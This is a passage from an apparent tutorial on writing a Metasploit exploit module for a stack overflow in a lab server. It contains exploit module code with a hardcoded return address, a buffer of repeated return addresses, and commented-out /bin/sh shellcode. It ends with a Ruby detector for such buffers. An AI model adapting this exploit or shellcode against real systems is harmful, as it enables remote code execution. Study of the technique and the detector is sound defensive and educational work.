Stack overflow attacks with Metasploit, part 4
With a vulnerability in hand we can attack it. First we need to understand Metasploit's exploit modules; for details see
http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
Metasploit itself is extremely capable; it is not covered in any depth here.
First we need to add an exploit module targeting this vulnerability.
We modify the sample module directly:
root@bt:~/.msf4/modules# mkdir exploits
root@bt:~/.msf4/modules# cd exploits
root@bt:~/.msf4/modules/exploits# mkdir linux
root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb myvictim.rb
root@bt:~/.msf4/modules/exploits/linux# ls
myvictim.rb myvictimserver.rb proftp_sreplace.rb
Then look at myvictim.rb:
##
# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

module Msf

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Exploits::Sample < Msf::Exploit::Remote

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sample exploit',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in a TCP server that has a parsing bug.
      },
      'Author'         => 'skape',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Windows All
          [
            'Windows Universal',
            {
              'Platform' => 'win',
              'Ret'      => 0x41424344
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends 1024 A's
  # followed by the fake return address and then the payload.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf  = "A" * 1024
    buf += [ target.ret ].pack('V')
    buf += payload.encoded

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end

end
Then we need to add it to Metasploit by running reload_all:
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > reload_all
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my
The module we just added is not listed here, which means something is wrong with it and it must be changed. Comparing the two listings, the fix drops the enclosing `module Msf`, renames the class to `Metasploit3` (the class name the 4.x loader looks for), adds a `Rank`, and sets the target and payload details for our server:
##
# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary TCP server.
#
###
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This exploit affects TCP servers, so we use the TCP client mixin.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MyVictimSever',
      'Description'    => %q{
        This exploit module illustrates how a vulnerability could be exploited
        in a TCP server that has a stack overflow bug.
      },
      'Author'         => 'bai',
      'Version'        => '$Revision: 9212 $',
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'    => 116,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'MyVictimSever run on linux',
            {
              'Platform' => 'Linux',
              'Ret'      => 0xbffff4a4
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  #
  # The sample exploit just indicates that the remote host is always
  # vulnerable.
  #
  def check
    return Exploit::CheckCode::Vulnerable
  end

  #
  # The exploit method connects to the remote service and sends the return
  # address, then the payload, then 100 more copies of the return address.
  #
  def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Build the buffer for transmission
    buf = ""
    #buf = "\x90" * 15
    #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";
    buf += "\xa4\xf4\xff\xbf"              # target.ret (0xbffff4a4) in little-endian byte order
    buf += payload.encoded
    buf += [].fill(target.ret, 0, 100).pack('V*')   # 100 copies of the return address

    # Send it off
    sock.put(buf)
    sock.get

    handler
  end

end
Now the module can be found:
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictim
use exploit/linux/mysql/mysql_yassl_hello use exploit/linux/myvictimserver
msf > use exploit/linux/my
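As an added example (not code from the original post and not part of Metasploit), here is the defender's side of the buffer the module above sends. The server receives a few hundred bytes made of a payload wrapped in copies of one 32-bit stack address (the module repeats 0xbffff4a4 a hundred times with `[].fill(target.ret, 0, 100).pack('V*')`), and the Metasploit sample module sends 1024 'A's before its return address. Both shapes are easy to spot in a packet capture or in a server-side request log. The script below scans a received buffer for a long run of one filler byte and for a "return-address sled", the same 4-byte little-endian value repeated many times where that value lies in the 32-bit Linux stack range. The stack range, the thresholds and the sample buffers are assumptions constructed for this example.

```ruby
# Added example, not part of the original post: a heuristic that flags the
# shape of the buffer the exploit module above sends, for use in a packet
# capture or server-side logging script. All constants and samples below are
# assumptions constructed for this example.

# 32-bit Linux userland stack range (assumption; the module's Ret is 0xbffff4a4).
STACK_RANGE = (0xbf000000..0xbfffffff)

# Longest run of one identical byte in buf (the sample module sends "A" * 1024).
def longest_byte_run(buf)
  best = 0
  run = 0
  prev = nil
  buf.each_byte do |b|
    run = (b == prev) ? run + 1 : 1
    prev = b
    best = run if run > best
  end
  best
end

# Longest run of one identical little-endian dword that lies in STACK_RANGE,
# checked at all four byte alignments (the module writes 100 copies of
# target.ret with [].fill(target.ret, 0, 100).pack('V*')).
def longest_address_run(buf)
  best = { value: nil, count: 0 }
  4.times do |align|
    run = 0
    prev = nil
    buf[align..-1].to_s.unpack('V*').each do |word|
      run = (word == prev) ? run + 1 : 1
      prev = word
      if STACK_RANGE.cover?(word) && run > best[:count]
        best = { value: word, count: run }
      end
    end
  end
  best
end

# Returns human-readable reasons; an empty list means nothing suspicious.
def suspicious_reasons(buf, filler_threshold: 256, sled_threshold: 16)
  reasons = []
  filler = longest_byte_run(buf)
  if filler >= filler_threshold
    reasons << format('filler run of %d identical bytes', filler)
  end
  sled = longest_address_run(buf)
  if sled[:count] >= sled_threshold
    reasons << format('stack address 0x%08x repeated %d times', sled[:value], sled[:count])
  end
  reasons
end

# Constructed samples (not captured traffic).
RET = [0xbffff4a4].pack('V')                              # "\xa4\xf4\xff\xbf", as in the module
SAMPLE_SLED   = (RET + 'P' * 116 + RET * 100).b           # ret, 116-byte payload stand-in, 100 x ret
SAMPLE_FILLER = ('A' * 1024 + [0x41424344].pack('V')).b   # shape of the Metasploit sample module
SAMPLE_BENIGN = "GET / HTTP/1.0\r\nHost: example.test\r\n\r\n".b

if __FILE__ == $0
  { 'sled' => SAMPLE_SLED, 'filler' => SAMPLE_FILLER, 'benign' => SAMPLE_BENIGN }.each do |name, buf|
    reasons = suspicious_reasons(buf)
    puts "#{name}: #{reasons.empty? ? 'ok' : reasons.join('; ')}"
  end
end
```

The thresholds should be tuned to the protocol the server actually speaks, since a legitimate binary protocol can carry long repeated fields; the check is a cheap first filter for a sensor or a log parser, not a substitute for putting a bounds check into the server.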